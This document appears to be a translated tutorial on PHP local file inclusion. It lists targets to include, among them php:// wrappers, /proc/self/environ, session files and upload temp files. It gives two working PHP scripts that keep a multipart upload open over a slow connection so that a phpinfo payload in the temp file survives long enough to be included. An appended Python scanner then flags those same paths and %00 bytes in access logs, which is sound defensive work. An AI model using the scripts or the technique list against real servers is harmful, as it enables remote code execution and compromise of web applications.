#!/usr/bin/k4shifz
For more information, see php_lfi_rfc1867_temporary_files.pdf, a foreign paper. To sum up (as follows):
1. Include uploaded files: jpg, txt, rar, and other files.
2. Include various logs.
3. Use PHP wrappers, such as php://input, php://filter, and data.
4. Include /proc/self/environ. If you are not familiar with Linux, you will be able to use it.
5. Include SESSION files, which PHP saves in the format sess_SESSIONID. The default locations are /tmp/ and c:/windows/temp/.
6. Include files, caches, templates, and other files generated by PHP programs.
7. Include the tmp file. The format is /tmp/phpUs7MxA and c:/windows/temp/php3e.tmp.
(Brute-force cracking: up to four random characters on Windows and six random characters on Linux; the charset is 'A'-'Z', 'a'-'z', '0'-'9'.)
The last one is too troublesome. Don't take it for granted that the tmp file is related to move_uploaded_file(). In fact, when there is no move_uploaded_file() call, PHP automatically and immediately clears the tmp file; the method for keeping it on the server is a slow connection.
Test scripts for including the temp file. The only advantage of this method is that the packet can be sent to any PHP file: PHP generates the tmp file on the server first, and the slow connection then prevents it from being deleted.
(The premise is that file_uploads = On in php.ini. max_file_uploads was added in 5.3.1; by default, up to 20 files can be uploaded at a time.)
<?php
/* Takes little time; 20 temporary files will be generated */
set_time_limit(0);
/* One multipart part; it is sent again on every loop iteration */
$cmd = 'Content-Disposition: form-data; name="edevil"; filename="edevil.php"
Content-Type: zzz

<? phpinfo() ?>
--k4shifz_boundary
';
$fs = fsockopen('localhost', 80);
/* You can also use HTTP/1.1 */
fputs($fs, 'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
' . $cmd);
/* The declared Content-Length is never reached, so the request stays open */
while ($fs)
{
    fputs($fs, $cmd);
    sleep(1);
}
fclose($fs);
exit;
?>
<?php
/* Takes a long time; one temporary file is generated */
set_time_limit(0);
$fs = fsockopen('localhost', 80);
fputs($fs, 'POST /test.php HTTP/1.0
Content-Type: multipart/form-data; boundary=k4shifz_boundary
Host: localhost
Content-Length: 999999

--k4shifz_boundary
Content-Disposition: form-data; name="edevil"; filename="edevil.php"
Content-Type: zzz

<? phpinfo() ?>
--k4shifz_boundary--
');
/* Keep sending filler bytes so the request never completes */
while ($fs)
{
    fputs($fs, 'AAAA');
    sleep(1);
}
fclose($fs);
exit;
?>
In addition, according to Gary Daniel's blog, the null truncation has been fixed in PHP 5.3.4, and the stage will be replaced by about %00.
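For the defending side, the inclusion targets in the numbered list and the %00 truncation map directly onto patterns that can be searched for in web server access logs. The following is an added example, not part of the original post: the rule names, the `scan` and `classify` functions and the sample log lines are all constructed for illustration, and it assumes combined-format logs where the include parameter travels in the query string.

```python
import re
from urllib.parse import parse_qsl

# One rule per inclusion target named in the list above.
RULES = [
    ("php-wrapper",  re.compile(r"^\s*(php://(input|filter)|data:)", re.I)),
    ("proc-environ", re.compile(r"/proc/self/environ", re.I)),
    ("session-file", re.compile(r"(^|[/\\])sess_[0-9a-z,-]+", re.I)),
    # /tmp/phpXXXXXX on Linux, ...\temp\phpXXXX.tmp on Windows
    ("upload-tmp",   re.compile(
        r"/tmp/php[a-z0-9]{6}(?![a-z0-9])|[/\\]temp[/\\]php[a-z0-9]{1,4}\.tmp",
        re.I)),
    ("null-byte",    re.compile(r"\x00")),  # %00 after URL decoding
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the names of all rules that a decoded parameter value matches."""
    return [name for name, rx in RULES if rx.search(value)]

def scan(lines):
    """Return (line number, parameter, rule) for every suspicious parameter."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = m.group(1).partition("?")[2]
        # parse_qsl percent-decodes, so %00 becomes a real NUL byte here.
        for param, value in parse_qsl(query, keep_blank_values=True):
            hits += [(lineno, param, rule) for rule in classify(value)]
    return hits

# Constructed access-log lines (combined format), not from a real server.
_P = '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
SAMPLE_LOG = [
    _P + '"GET /index.php?page=news HTTP/1.1" 200 512',
    _P + '"GET /index.php?page=php://input HTTP/1.1" 200 90',
    _P + '"GET /index.php?page=/proc/self/environ%00 HTTP/1.1" 200 700',
    _P + '"GET /index.php?page=/tmp/sess_0123456789abcdef0123456789abcdef HTTP/1.1" 200 40',
    _P + '"GET /view.php?tpl=/tmp/phpUs7MxA HTTP/1.1" 200 33',
    _P + '"GET /view.php?tpl=c:/windows/temp/php3e.tmp HTTP/1.1" 200 33',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Parameters sent in a POST body do not appear in access logs, so the same `classify` rules would have to run wherever request bodies are visible, such as a WAF or application-level logging.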